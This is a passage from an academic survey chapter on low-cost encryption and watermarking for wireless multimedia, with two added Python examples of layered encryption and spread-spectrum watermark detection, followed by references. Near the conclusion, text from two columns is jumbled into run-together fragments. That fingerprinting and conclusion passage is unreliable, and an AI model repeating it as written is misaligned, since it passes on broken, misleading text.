Figure 5, which encrypts only the base layer and middle layer in the three layers (base layer, middle layer, and enhancement layer) of an MPEG2 video stream. In this algorithm, the enhancement layer is left unencrypted, which can be cut off directly. Wee and Apostolopoulos (2001, 2003) and Zhu, Yuan, Wang, and Li (2005) proposed the algorithms for secure scalable streaming enabling transcoding without decryption. Generally, the stream is partitioned into segments according to the cipher's code length. To change the bit-rate, some segments at the end of the stream are cut off directly.

The Watermarking Algorithms for Wireless Multimedia

Watermarking algorithms (Barni & Bartolini, 2004; Cox et al., 2002) are generally composed of two parts, that is, watermark embedding and watermark extraction/detection. Generally, watermarking algorithms should be robust to some operations, such as recompression, A/D or D/A conversion, noise, filtering, and so forth, and can survive such attacks as geometric attack, collusion attack, copy attack, and so forth. Similar to encryption algorithms, some watermarking algorithms may be of high security and robustness, but they are also of high time or energy cost. On the contrary, the watermarking algorithms with low cost are often of low security or robustness. This contradiction becomes a problem in wireless/mobile environment when only limited energy or computing capability is provided. Experiments have been done to analyze the energy consumption, complexity and security level of multimedia watermarking on mobile handheld devices (Kejariwal, Nicolau, Dutt, & Gupta, 2005), and some conclusions are drawn: (1) the security level often contradicts with energy consumption, (2) watermark extraction/detection may be of higher cost than watermark embedding, and (3) image resolution affects the energy consumption. To conquer these problems, some proposals are presented, for example, introducing tunable parameters to obtain trade-offs between security level, energy consumption, and other performances, or moving some computationally expensive tasks to mobile proxies.

Mobile Agent Based Task Partitioning

Mobile agents use the proxies as agents that can connect to a range of heterogeneous mobile terminals. Using mobile agents to reduce the load of the server or terminals has been widely studied (Burnside et al., 2002; Rao, Chang, Chen, & Chen, 2001). If the mobile agent can implement watermark embedding or extraction/detection, then the terminals' computing load will be greatly reduced.
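The segment-based scheme of Figure 4 and the layered scheme of Figure 5 above, worked through in Python as an added example (not code from the chapter or from the cited papers): the per-frame keys K0 … KN-1 are derived from a master key and the frame index with HMAC, and the cipher is a stand-in HMAC-SHA256 counter-mode keystream rather than any cited algorithm; both are assumptions.

```python
import hashlib
import hmac


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR data with an HMAC-SHA256 counter-mode keystream.

    Stand-in for the stream/block ciphers the chapter cites (AES, RC4, ...):
    it needs only the standard library, and since XOR is its own inverse the
    same call both encrypts and decrypts. Assumption, not a cited algorithm.
    """
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        msg = nonce + counter.to_bytes(4, "big")
        stream.extend(hmac.new(key, msg, hashlib.sha256).digest())
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def frame_key(master_key: bytes, frame_index: int) -> bytes:
    """K_i for frame i, derived from the master key K and the frame index.

    Deriving (rather than transmitting) the keys is what lets a receiver
    resynchronise after a lost frame: the index carried with each segment
    is enough to rebuild K_i. The HMAC-based derivation is an assumption.
    """
    return hmac.new(master_key, b"frame-key" + frame_index.to_bytes(4, "big"),
                    hashlib.sha256).digest()


def segment_encrypt(frames, master_key):
    """Figure 4: each frame i is a segment keyed with K_i; every slice j of
    that frame is a subsegment encrypted independently under K_i.

    frames: list of frames, each a list of slice byte strings.
    Returns a list of (frame_index, slice_index, ciphertext) packets.
    """
    packets = []
    for i, slices in enumerate(frames):
        k_i = frame_key(master_key, i)
        for j, plain in enumerate(slices):
            # Distinct nonce per slice so slices never share keystream.
            packets.append((i, j, keystream_xor(k_i, j.to_bytes(4, "big"), plain)))
    return packets


def segment_decrypt(packets, master_key, num_frames, num_slices):
    """Decrypt whatever packets arrived; missing segments stay None.

    A lost slice affects only itself and a lost frame only itself, because
    no keystream or chaining state crosses segment boundaries.
    """
    frames = [[None] * num_slices for _ in range(num_frames)]
    for i, j, ciphertext in packets:
        k_i = frame_key(master_key, i)
        frames[i][j] = keystream_xor(k_i, j.to_bytes(4, "big"), ciphertext)
    return frames


ENCRYPTED_LAYERS = ("base", "middle")  # Figure 5: enhancement layer stays clear


def scalable_encrypt(layers, key):
    """Figure 5: encrypt the base and middle layers of a three-layer stream,
    leave the enhancement layer in the clear so it can be cut without keys."""
    return {name: (keystream_xor(key, name.encode(), data)
                   if name in ENCRYPTED_LAYERS else data)
            for name, data in layers.items()}


def cut_enhancement(encrypted_layers):
    """Bit-rate reduction performed by an intermediate node that holds no key."""
    return {name: (b"" if name == "enhancement" else data)
            for name, data in encrypted_layers.items()}


def scalable_decrypt(encrypted_layers, key):
    # The same XOR call undoes the encryption; the enhancement layer passes through.
    return scalable_encrypt(encrypted_layers, key)


def demo():
    """Constructed sample data: 3 frames x 3 slices and a three-layer stream."""
    master = b"constructed-master-key-K"
    frames = [[f"f{i}s{j}".encode() for j in range(3)] for i in range(3)]
    packets = segment_encrypt(frames, master)
    # Simulate loss of slice 1 of frame 0 and of the whole of frame 1.
    arrived = [p for p in packets if p[0] != 1 and (p[0], p[1]) != (0, 1)]
    recovered = segment_decrypt(arrived, master, 3, 3)
    layers = {"base": b"BASE", "middle": b"MID", "enhancement": b"ENH"}
    cut = cut_enhancement(scalable_encrypt(layers, master))
    return recovered, scalable_decrypt(cut, master)


if __name__ == "__main__":
    print(demo())
```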

Figure 6. Watermarking tasks partitioning based on mobile agents [diagram not reproduced]


The scheme proposed in Liu and Jiang (2005), as shown in Figure 6, uses mobile agents to replace terminals to realize watermark detection, which decreases the server and network's load during detecting watermarks. In another scheme (Kejariwal, Gupta, Nicolau, Dutt, & Gupta, 2004), the watermark embedding and detection tasks are both partitioned and moved to mobile proxies completely or partially. For example, to keep secure, only some tasks not sensitive to the security are moved out, such as image transformation, bit decomposition, plane alignment, and so forth. The partitioning schemes make watermarking applications more practical in mobile environment.

Lightweight Watermarking Algorithms

Using mobile agents to implement some watermarking related tasks can reduce the load of the server or terminals to some extent. However, frequent interactions between mobile agent and terminals are still costly. To reduce the cost of the server or terminals, improving the efficiency of watermark embedding or extraction/detection algorithms is a key problem. Considering that the watermark is often embedded into the transformation domain, some lightweight algorithms are proposed to implement transformation domain watermarking. Two typical ones are shown in Figure 7. The first one, as shown in Figure 7a, uses fast transformations to reduce the cost of converting media data into frequency domain. The second one, as shown in Figure 7b, embeds the watermark into the compressed media data according to the following steps: (1) reconstruct the coefficients partially from the compressed data stream, (2) embed the watermark into the selected coefficients, and (3) re-encode the watermarked coefficients. In the following content, some lightweight watermarking algorithms are introduced and analyzed.

Figure 7. Architectures of some lightweight watermarking algorithms: (a) fast transformation based watermarking embedding (media data → fast transformation → watermark embed → fast inverse transformation → watermarked media data); (b) watermarking embedding in compressed media data (compressed media data → partial reconstruction → watermark embed → partial encoding → watermarked media data)

A scalable watermarking algorithm is proposed to mark the audio data encoded with Advanced Audio Zip (AAZ) (Li, Sun, & Lian, 2005). In this algorithm, the watermark is embedded into the quantized modified discrete cosine transform (MDCT) coefficients in the core layer adaptively, and detected by computing the correlation between the spreading sequence and the bitstream. A speech watermarking scheme is proposed in Arora and Emmanuel (2003), which is designed based on the adaptive modulation of spread spectrum sequences and is robust against some removal or impairment attacks. The experiments in global system for mobile communications (GSM) cellular communications show that the algorithm is suitable for mobile applications.
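Correlation-based detection of a spread-spectrum watermark, as the AAZ and speech schemes just described use it, written here as an added Python example rather than code from the chapter or the cited papers; the SHA-256-derived chip sequence, the additive embedding rule, the constructed coefficient values and the noise-plus-requantisation step are all assumptions. The block also goes one step beyond the text by measuring the bit error rate after processing and the detector's response to a wrong key.

```python
import hashlib
import random


def spreading_sequence(key: bytes, length: int) -> list:
    """Key-dependent pseudo-random chip sequence of +1/-1 values.

    Built from SHA-256 of key || counter; constructed here because the chapter
    does not say how the cited schemes generate their sequences.
    """
    chips = []
    counter = 0
    while len(chips) < length:
        digest = hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        for byte in digest:
            chips.extend(1 if (byte >> bit) & 1 else -1 for bit in range(8))
        counter += 1
    return chips[:length]


def embed(coeffs, bits, key: bytes, chips_per_bit: int, alpha: float):
    """Additive spread-spectrum embedding into transform coefficients.

    Bit i (0 or 1) is mapped to -1/+1 and multiplies its own stretch of the
    spreading sequence; alpha trades imperceptibility (small) against
    robustness (large).
    """
    seq = spreading_sequence(key, len(bits) * chips_per_bit)
    marked = list(coeffs)
    for i, bit in enumerate(bits):
        sign = 1 if bit else -1
        for j in range(chips_per_bit):
            idx = i * chips_per_bit + j
            marked[idx] += alpha * sign * seq[idx]
    return marked


def detect(coeffs, n_bits: int, key: bytes, chips_per_bit: int):
    """Oblivious detection: correlate the received coefficients with the key's
    spreading sequence; the sign of each per-bit correlation is the bit.

    The original (unmarked) media is not needed. The host coefficients are
    nearly uncorrelated with the sequence, so their contribution averages
    out, while the embedded term contributes alpha per chip.
    """
    seq = spreading_sequence(key, n_bits * chips_per_bit)
    bits, correlations = [], []
    for i in range(n_bits):
        chunk = range(i * chips_per_bit, (i + 1) * chips_per_bit)
        corr = sum(coeffs[k] * seq[k] for k in chunk) / chips_per_bit
        correlations.append(corr)
        bits.append(1 if corr > 0 else 0)
    return bits, correlations


def simulate_processing(coeffs, noise_std: float, seed: int = 7):
    """Constructed stand-in for acceptable processing: additive noise followed
    by requantisation to integers, as recompression would do."""
    rng = random.Random(seed)
    return [float(round(c + rng.gauss(0.0, noise_std))) for c in coeffs]


def bit_error_rate(sent, received) -> float:
    return sum(1 for a, b in zip(sent, received) if a != b) / len(sent)


def demo():
    """Constructed quantised coefficients (32 bits x 64 chips): mark them,
    process them, measure what survives, and check a wrong key."""
    rng = random.Random(1)
    key, wrong_key = b"constructed-watermark-key", b"some-other-key"
    n_bits, chips_per_bit, alpha = 32, 64, 4.0
    host = [float(rng.randint(-8, 8)) for _ in range(n_bits * chips_per_bit)]
    bits = [rng.randint(0, 1) for _ in range(n_bits)]
    marked = embed(host, bits, key, chips_per_bit, alpha)
    clean_bits, clean_corr = detect(marked, n_bits, key, chips_per_bit)
    processed = simulate_processing(marked, noise_std=3.0)
    noisy_bits, _ = detect(processed, n_bits, key, chips_per_bit)
    _, wrong_corr = detect(marked, n_bits, wrong_key, chips_per_bit)
    return {
        "ber_clean": bit_error_rate(bits, clean_bits),
        "ber_processed": bit_error_rate(bits, noisy_bits),
        "mean_abs_corr_right_key": sum(map(abs, clean_corr)) / n_bits,
        "mean_abs_corr_wrong_key": sum(map(abs, wrong_corr)) / n_bits,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value:.3f}")
```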


For images, an efficient steganography scheme (Pal, Saxena, & Muttoo, 2004) is proposed for resource constrained wireless networks. In this scheme, the coefficients in Hadamard transform domain are manipulated to contain some hidden information. The Discrete Hadamard Transform can be implemented using fast algorithms, which makes the scheme computationally efficient and practical in mobile communications.

For videos, a spread spectrum watermarking algorithm (Petrescu, Mitrea, & Preteux, 2005) is proposed to protect low rate videos. In this algorithm, the DCT or wavelet coefficients of transformed video data are watermarked with spread spectrum sequences. Experiments are done for the videos varying from 64 kbit/s to 256 kbit/s, and suitable transparency or robustness is obtained. Furthermore, a more efficient algorithm (Checcacci, Barni, Bartolini, & Basagni, 2000) is proposed to mark MPEG4 videos. In this algorithm, only the Luma macroblocks are watermarked by adjusting the coefficients' value in each coefficient pair. It is proved efficient in implementation and robust to transmission errors. Additionally, a more robust video watermarking algorithm (Alattar, Lin, & Celik, 2003) is proposed for low bit rate MPEG4 videos. In this algorithm, the watermark is composed of both the synchronization template and the watermark content combined with the template, and the watermark is embedded into the alternating current (AC) coefficients of the luminance plane of the VOPs. The template can survive geometric attacks, such as transcoding, cropping, scaling, rotation, noise, and so forth. Experiments on various videos are done, which show good performances for the video rate ranging from 128 kbit/s to 768 kbit/s.

Communication Compliant Algorithms

In wireless/mobile communication, transmission errors often happen, which may reduce the watermark detection rate. Generally, several means may be adopted to improve the watermarking algorithm's robustness against transmission errors. The first one, as shown in Figure 8a, is applying

error-correcting codes (ECC) to encode the watermark before embedding it into the multimedia data. For example, the watermark can be repeated several times (Kundur, 2001), such codes as convolutional code, block code, or turbo code are used to encode the watermark (Ambroze et al., 2001), or the combination of watermark repetition and error-correcting code is used (Desset, Macq, & Vandendorpe, 2002). This kind of method improves the robustness by increasing the redundancy in the watermark. The second method, as shown in Figure 8b, is using multiple description code (MDC) to transmit the watermark or the watermarked multimedia data. For example, the watermark is encoded with MDC before being embedded (Hsia, Chang, & Liao, 2004), the watermarked media data are transmitted based on MDC (Chu, Hsin, Huang, Huang, & Pan, 2005; Pan, Hsin, Huang, & Huang, 2004), or both the watermark and the watermarked media data are encoded with MDC (Ashourian & Ho, 2003). This kind of method adopts the redundancy of multimedia data and is more suitable for the scenario of high error rate. Another method (Song, Kim, Lee, & Kim, 2002) partitions multimedia data into segments each of which fits the packet in wireless transmission, and then embeds a watermark into each packet. Thus, it is robust to wireless packet error conditions including not only channel error but also delay and jitter.

Figure 8. Architectures of some robust watermarking algorithms: (a) ECC based watermarking scheme (watermark → ECC encode → watermark embed into media data → watermark extract → ECC decode → extracted watermark); (b) MDC based watermarking scheme (watermark → MDC encode → watermark embed into media data → MDC encode → MDC decode → watermark extract → MDC decode → extracted watermark)

Combination of Multimedia Encryption and Multimedia Watermarking

Multimedia encryption and watermarking realize different functionalities, for example, confidentiality protection and ownership protection; they can be combined together to provide stronger security. This is also required by some applications, such as secure multimedia sharing, secure multimedia distribution, or exchange between watermarking and encryption.

Secure Multimedia Sharing

Multimedia sharing is more and more popular with the development of network technology, especially when such a network as p2p is developed. Generally, in these applications, the ownership information is embedded into the multimedia data with watermarking technology, and then the watermarked multimedia data are encrypted and distributed. The ownership information can be extracted later to prove the ownership right, and the encryption process prevents unauthorized users from accessing the real content of the multimedia data. A typical example is the music sharing system named Music2Share (Kalker, Epema, Hartel, Lagendijk, & Steen, 2004), as shown in Figure 9. In this system, the watermark representing ownership information is embedded into music files, and the

watermarked files are encrypted then distributed over p2p networks. The customer can access the encrypted music files, but must apply for the right from the server before he can decrypt the files. The watermark extracted from the music file can prove the legality of the music.

Figure 9. Architecture of a multimedia sharing system [media server, content, and access right; diagram not reproduced]

Secure Multimedia Distribution

In secure multimedia distribution, multimedia data are transmitted from the server to customers in a secure way. In this case, the confidentiality can be protected, and the illegal distributor who redistributes his/her copy to other customers can be traced. Generally, both encryption and watermarking technology are used. Till now, three kinds of schemes have been proposed, which embed watermarks at the server side, in the router, or at the client side, respectively. In the first kind of scheme, the customer information is embedded into multimedia data at the server side before multimedia encryption. This scheme is more suitable for unicast than for multicast or broadcast because it is difficult for the server to assign different copies to different customers simultaneously. In the second kind of scheme, the customer information is embedded by the routers in lower level (Brown, Perkins, & Crowcroft, 1999), which distributes the server's loading to the routers. This scheme reduces the server's loading, but also changes the network protocols. In the third kind of scheme, the customer information is embedded at the customer side (Bloom, 2003). This scheme is time efficient, but the security is a problem because of the isolation between decryption and watermarking. Some means (Anderson & Manifavas, 1997; Kundur & Karthik, 2004; Lian, Liu, Ren, & Wang, 2006b) have been proposed to improve the security, which combine decryption with watermark embedding. These combined methods improve the system's security while keeping low cost.

Commutative Watermarking and Encryption

Generally, watermarking operation and encryption operation are separate. That is, the encrypted multimedia data should be decrypted before being watermarked. In some applications, if the operation triple decryption-watermarking-encryption can be avoided, the operation cost will be reduced greatly. In this case, the encrypted multimedia data can be watermarked directly without decryption, and the watermark can be extracted directly from the encrypted or decrypted multimedia data. This kind of watermarking-encryption pair is named commutative watermarking and encryption (CWE). A practical scheme is proposed in Lian, Liu, Ren, and Wang (2006c), which is based on partial encryption. In this scheme, multimedia data are partitioned into two parts, that is, the perception significant part and the robust part, among which the perception significant part is encrypted, while the robust part is watermarked. Thus, the encryption and watermarking are independent of each other, and they support the commutative operations.

Open Issues

Contradiction between Format Independence and Format Compliance

To keep low cost, partial encryption schemes are used to encrypt multimedia data, which keep format compliance. Thus, for different multimedia data or different codecs, the encryption algorithms are often different. If various multimedia data are included in an application, then various encryption algorithms should be used, and some extra information is required to tell which encryption algorithm has been used. Compared with format compliant encryption, format independent encryption regards multimedia data as binary data and is easy to support various data. Thus, for the applications with versatile data, format independent encryption is more suitable. For example, in such DRM systems as internet streaming media alliance (ISMA), advanced access content system (AACS), or open mobile alliance (OMA) (Kundur et al., 2004), the algorithms advanced encryption standard (AES) and data encryption standard (DES) are recommended to encrypt multimedia data without considering the file format. Thus, for practical applications, the trade-off between computational cost and convenience is to be made, which determines which kind of algorithm should be used.

Standardization of Watermarking Algorithms

Compared with encryption algorithms that have been standardized to some extent, watermarking algorithms are still in study. For the diversity of multimedia content, the difficulty in multimedia understanding, and the variety of applications, it is difficult to standardize multimedia watermarking algorithms. Generally, they have different performances in security, efficiency, robustness, capacity, and so forth. Which watermarking algorithm to use depends on the performances required by the applications. Defining suitable watermarking algorithms will provide more convenience to wireless/mobile applications.

Fingerprint Algorithms Against Collusion Attacks

In secure multimedia distribution, collusion attack (Zhao, Wang, & Liu, 2005) threatens the system. That is, different customers combine their copies together through averaging, substitution, and so forth, which produces a copy without any customer information. To counter this attack,

Key Management in Mobile Applications

Multimedia encryption and watermarking can both be controlled by the keys; key management needs to be investigated. For example, whether the encryption key should be independent of the watermarking key, and how to assign different decryption keys to different customers in multimedia distribution? Additionally, for multicast or p2p networks, key generation and distribution (Cherukuri, 2004; Eskicioglu, 2002) are important topics not only in fixed networks but also in mobile environments.

Conclusion

In this chapter, mobile/wireless multimedia encryption and watermarking algorithms are introduced and analyzed, including the general requirements, various multimedia encryption algorithms, some watermarking algorithms, the combination between encryption and watermarking, and some open issues. Among them, the multimedia encryption algorithms are classified and analyzed according to the functionalities, and the watermarking algorithms with low cost are emphasized. The combination between encryption and watermarking brings up some new research topics, for example,
somefingerfingerprintorcommutativewatermarking
print encoding methods (Boneh & James, 1998; Wu, and encryption. And some open issues are also
Trappe, Wang, & Liu, 2004) have been proposed. presented, including the contradiction between
Thesemethodsgeneratedifferentfingerprint codesand format independence, the
format compliance
for different customers, and the colluded copy can standardization of watermarking algorithms, the
still tell one or more of the colluders. However, fingerprintalgorithmsresistingcollusionatt
there is still a trade-off between the watermark and the key management in mobile applications.
capacity and the supported customers, and some
new attacks are still not predicted, such as the linear
combination collusion attack (LCCA) attack (Wu, rEfErEncEs
Thus,
. )05 2 betterfingerprintencodingmethods
withgoodefficiencyareexpected. Ahn, J., Shim, H., Jeon, B., & Choi, I. (2004). Digital
video scrambling method using intra prediction
mode. In PacificRimConferenceonMultimedia,
PCM2004 (LNCS 3333, 386-393). Springer.


Alattar, A., Lin, E., & Celik, M. (2003). Digital watermarking of low bit-rate advanced simple profile MPEG-4 compressed video. IEEE Transactions on Circuits and Systems for Video Technology, 13, 787-800.

Ambroze, A., Wade, G., Serdean, C., Tomlinson, M., Stander, J., & Borda, M. (2001). Turbo code protection of video watermark channel. IEE Proceedings of Vision and Image Signal Processing, 148, 54-58.

Anderson, R., & Manifavas, C. (1997). Chameleon—A new kind of stream cipher. In Fast Software Encryption (LNCS, vol. 1267, pp. 107-113). Springer-Verlag.

Ando, K., Watanabe, O., & Kiya, H. (2001). Partial-scrambling of still images based on JPEG2000. In Proceedings of the International Conference on Information, Communications, and Signal Processing, Singapore.

Ando, K., Watanabe, O., & Kiya, H. (2002). Partial-scrambling of images encoded by JPEG2000. IEICE Transactions, J85-D-1(2), 282-290.

Arora, S., & Emmanuel, S. (2003). Real-time adaptive speech watermarking scheme for mobile applications. In Proceedings of the International Conference on Information, Communications & Signal Processing (ICICS)—IEEE Pacific-Rim Conference on Multimedia (PCM) (pp. 850-853).

Ashourian, M., & Ho, Y. (2003). Multiple description coding for image data hiding jointly in the spatial and DCT domains. In ICICS 2003 (LNCS 2836, pp. 179-190).

Barni, M., & Bartolini, F. (2004). Watermark systems engineering. Marcel Dekker.

Bloom, J. (2003). Security and rights management in digital cinema. Proceedings of IEEE International Conference on Acoustic, Speech and Signal Processing, 4, 712-715.

Boneh, D., & James, S. (1998). Collusion-secure fingerprinting for digital data. IEEE Transactions on Information Theory, 44(5), 1897-1905.

Brown, I., Perkins, C., & Crowcroft, J. (1999). Watercasting: Distributed watermarking for multicast media. In Proceedings of the First International Workshop on Networked Group Communication (LNCS 1736, pp. 286-300). Springer-Verlag.

Burnside, M., Clarke, D., Mills, T., Maywah, A., Devadas, S., & Rivest, R. (2002). Proxy-based security protocols in networked mobile devices. In Proceedings of the 2002 ACM Symposium on Applied Computing (pp. 265-272).

Chang, Y., Han, R., Li, C., & Smith, J. R. (2004). Secure transcoding of Internet content. In Proceedings of International Workshop on Intelligent Multimedia Computing and Networking (IMMCN) (pp. 940-943).

Checcacci, N., Barni, M., Bartolini, F., & Basagni, S. (2000). Robust video watermarking for wireless multimedia communications. In Proceedings of the 2000 IEEE Conference on Wireless Communications and Networking (pp. 1530-1535).

Cherukuri, S. (2004). An adaptive scheme to manage mobility for secure multicasting in wireless local area networks. Unpublished master's thesis, Arizona State University, Tempe.

Chu, S., Hsin, Y., Huang, H., Huang, K., & Pan, J. (2005). Multiple description watermarking for lossy network. IEEE Computer Society, 4, 3990-3993.

Cox, I., Miller, M., & Bloom, J. (2002). Digital watermarking. San Francisco: Morgan Kaufmann.

Desset, C., Macq, B., & Vandendorpe, L. (2002). Block error-correcting codes for systems with a very high BER: Theoretical analysis and application to the protection of watermarks. Signal Processing: Image Communication, 17, 409-421.

Dutta, A., Das, S., Li, P., & Auley, A. (2004). Secured mobile multimedia communication for wireless Internet. In Proceedings of 2004 IEEE International Conference on Networking, Sensing & Control (pp. 181-186).

Eskicioglu, A. (2002). Multimedia security in group communications: Recent progress in wired and wireless networks. In Proceedings of the IASTED International Conference on Communications and Computer Networks, Cambridge, MA (pp. 125-133).

Furht, B., & Kirovski, D. (Eds.). (2006). Multimedia encryption and authentication techniques and applications. Boca Raton, FL: Auerbach Publications.

Gang, L., Akansu, A., Ramkumar, M., & Xie, X. (2001). Online music protection and MP3 compression. In Proceedings of the International Symposium on Intelligent Multimedia, Video and Speech Processing (pp. 13-16).

Ganz, A., Park, S., & Ganz, Z. (1998). Inline network encryption for multimedia wireless LANs. In Proceedings of the IEEE Military Communications Conference.

Ganz, A., Park, S., & Ganz, Z. (1999). Experimental measurements and design guidelines for real-time software encryption in multimedia wireless LANs. Cluster Computing, 2(1), 35-43.

Goodman, J., & Chandrakasan, A. (1998). Low power scalable encryption for wireless systems. Wireless Networks, 4, 55-70.

Hamalainen, P., Hannikainen, M., Hamalainen, T., & Saarinen, J. (2001). Configurable hardware implementation of triple DES encryption algorithm for wireless local area network. In Proceedings of the 2001 IEEE International Conference on Acoustics, Speech and Signal Processing (pp. 1221-1224).

Hsia, Y., Chang, C., & Liao, J. (2004). Multiple-description coding for robust image watermarking. In Proceedings of the 2004 International Conference on Image Processing (pp. 2163-2166).

Kalker, T., Epema, D., Hartel, P., Lagendijk, R., & Steen, M. (2004). Music2Share—Copyright-compliant music sharing in P2P systems. Proceedings of the IEEE, 92(6), 961-970.

Kejariwal, A., Gupta, S., Nicolau, A., Dutt, N., & Gupta, R. (2004). Proxy-based task partitioning of watermarking algorithms for reducing energy consumption in mobile devices. In Proceedings of the 2004 Design Automation Conference (pp. 556-561).

Kejariwal, A., Nicolau, S., Dutt, A., & Gupta, N. (2005). Energy analysis of multimedia watermarking on mobile handheld devices. In Proceedings of the International Conference on Embedded Systems for Real-Time Multimedia (ESTImedia 2005) (pp. 33-38).

Kim, G., Shin, D., & Shin, D. (2005). Intellectual property management on MPEG-4 video for hand-held device and mobile video streaming service. IEEE Transactions on Consumer Electronics, 51(1), 139-143.

Kundur, D. (2001). Watermarking with diversity: Insights and implications. IEEE Transactions on Multimedia, 8, 46-52.

Kundur, D., & Karthik, K. (2004). Video fingerprinting and encryption principles for digital rights management. Proceedings of the IEEE, 92(6), 918-932.

Kundur, D., Yu, H., & Lin, C. (2004). Security and digital rights management for mobile content. In T. Wu & S. Dixit (Eds.), Content delivery in the mobile Internet. John Wiley & Sons.

Kutter, M., Volosphynovskiy, S., & Herrigel, A. (2000). The watermarking copy attack. In Security and Watermarking of Multimedia Contents II (SPIE 3971, pp. 371-380).

Li, Z., Sun, Q., & Lian, Y. (2005). An adaptive scalable watermark scheme for high-quality audio archiving and streaming applications. In Proceedings of the IEEE International Conference on Multimedia and Expo.

Lian, S., Liu, Z., & Ren, Z. (2005a). Selective video encryption based on advanced video coding. In Proceedings of 2005 Pacific-Rim Conference on Multimedia (PCM2005), Part II (LNCS 3768, pp. 281-290).

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006b). Secure distribution scheme for compressed video stream. In Proceedings of the 2006 IEEE International Conference on Image Processing (ICIP 2006).



Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006c). Commutative watermarking and encryption for media data. International Journal of Optical Engineering, 45(8), 0805101-0805103.

Lian, S., Liu, Z., Ren, Z., & Wang, Z. (2005b). Selective video encryption based on advanced video coding. In Proceedings of Pacific-Rim Conference on Multimedia (PCM2005) (pp. 281-290).

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006a). Secure advanced video coding based on selective encryption algorithms. IEEE Transactions on Consumer Electronics, 52(2), 621-629.

Lian, S., Sun, J., & Wang, Z. (2004a). A novel image encryption scheme based on JPEG encoding. In Proceedings of International Conference on Information Visualization (IV) 2004 (pp. 217-220).

Lian, S., Sun, J., Zhang, D., & Wang, Z. (2004b). A selective image encryption scheme based on JPEG2000 codec. In Proceedings of 2004 Pacific-Rim Conference on Multimedia (PCM2004) (LNCS 3332, pp. 65-72). Springer.

Lian, S., Wang, Z., & Sun, J. (2004c). A fast video encryption scheme suitable for network applications. In Proceedings of International Conference on Communications, Circuits and Systems, 1, 566-570.

Linnartz, J., & Dijk, M. (1998, April 15-17). Analysis of the sensitivity attack against electronic watermarks in images. Paper presented at the Workshop on Information Hiding, Portland, OR.

Liu, Q., & Jiang, X. (2005). Applications of mobile agent and digital watermarking technologies in mobile communication network. In Proceedings of the 2005 International Conference on Wireless Communications, Networking and Mobile Computing (pp. 1168-1170).

Liu, X., & Eskicioglu, A. (2003). Selective encryption of multimedia content in distribution networks: Challenges and new directions. In Proceedings of the IASTED International Conference on Communications, Internet and Information Technology (CIIT 2003). Scottsdale, AZ: ACTA Press.

Mollin, R. (2006). An introduction to cryptography. CRC Press.

Nanjunda, C., Haleem, M., & Chandramouli, R. (2005). Robust encryption for secure image transmission over wireless channels. In Proceedings of the IEEE International Conference on Communications (ICC) (pp. 1287-1291).

Norcen, R., & Uhl, A. (2003). Selective encryption of the JPEG2000 bitstream. In IFIP International Federation for Information Processing (LNCS 2828, pp. 194-204).

Ong, C., Nahrstedt, K., & Yuan, W. (2003). Quality of protection for mobile multimedia applications. In Proceedings of the IEEE International Conference on Multimedia and Expo (ICME2003), Baltimore, MD.

Pal, S., Saxena, P., & Muttoo, S. (2004). Image steganography for wireless networks using the Hadamard transform. In Proceedings of the 2004 International Conference on Signal Processing and Communications (pp. 131-135).

Pan, J., Hsin, Y., Huang, H., & Huang, K. (2004). Robust image watermarking based on multiple description vector quantization. Electronics Letters, 40(22), 1409-1410.

Petitcolas, F., Anderson, R., & Kuhn, M. (1999). Information hiding—A survey. Proceedings of the IEEE, 87(7), 1062-1078.

Petrescu, M., Mitrea, M., & Preteux, F. (2005). Low rate video protection: The opportunity of spread spectrum watermarking. WSEAS Transactions on Communications, 7(4), 478-485.

Pfarrhofer, R., & Uhl, A. (2005). Selective image encryption using JBIG. In Proceedings of the IFIP TC-6 TC-11 International Conference on Communications and Multimedia Security (CMS 2005) (pp. 98-107).

Podesser, M., Schmidt, H., & Uhl, A. (2002). Selective bitplane encryption for secure transmission of image data in mobile environments. In CD-ROM Proceedings of the 5th IEEE Nordic Signal Processing Symposium (NORSIG 2002).



Pommer, A., & Uhl, A. (2003). Selective encryption of wavelet-packet encoded image data: Efficiency and security. In Proceedings of the Communications and Multimedia Security 2003 (pp. 194-204).

Potlapally, N., Raghunathan, A., & Jha, N. (2003). Analyzing the energy consumption of security protocols. In Proceedings of the 2003 International Symposium on Low Power Electronics and Design, Seoul, Korea (pp. 30-35).

Raghunathan, A., Ravi, S., Hattangady, S., & Quisquater, J. (2003). Securing mobile appliances: New challenges for the system designer. In Proceedings of the 2003 Europe Conference and Exhibition in Design, Automation and Test (pp. 176-181).

Rao, H., Chang, D., Chen, Y., & Chen, M. (2001). iMobile: A proxy-based platform for mobile services. In Proceedings of the Wireless Mobile Internet (pp. 3-10).

Salkintzis, A., & Passas, N. (2005). Emerging wireless multimedia: Services and technologies. John Wiley & Sons.

Scopigno, R., & Belfiore, S. (2004). Image decomposition for selective encryption and flexible network services. In Proceedings of the IEEE Globecom 2004, Dallas, TX.

Servetti, A., & Martin, J. (2002a). Perception-based selective encryption of G.729 speech. Proceedings of IEEE ICASSP, 1, 621-624.

Servetti, A., & Martin, J. (2002b). Perception-based selective encryption of compressed speech. IEEE Transactions on Speech and Audio Processing, 10(8), 637-643.

Servetti, A., Testa, C., Carlos, J., & Martin, D. (2003). Frequency-selective partial encryption of compressed audio. Paper presented at the International Conference on Audio, Speech and Signal Processing, Hong Kong.

Shi, C., & Bhargava, B. (1998a). A fast MPEG video encryption algorithm. In Proceedings of the 6th ACM International Multimedia Conference, Bristol, UK (pp. 81-88).

Shi, C., & Bhargava, B. (1998b). An efficient MPEG video encryption algorithm. In Proceedings of the 6th ACM International Multimedia Conference, Bristol, UK (pp. 381-386).

Song, G., Kim, S., Lee, W., & Kim, J. (2002). Meta-fragile watermarking for wireless networks. In Proceedings of the International Conference of Communications, Circuits, and Systems.

Sridharan, S., Dawson, E., & Goldburg, B. (1991). Fast Fourier transform based speech encryption system. IEE Proceedings of Communications, Speech and Vision, 138(3), 215-223.

Tang, L. (1996). Methods for encrypting and decrypting MPEG video data efficiently. In Proceedings of the Fourth ACM International Multimedia Conference (ACM Multimedia'96), Boston, MA (pp. 219-230).

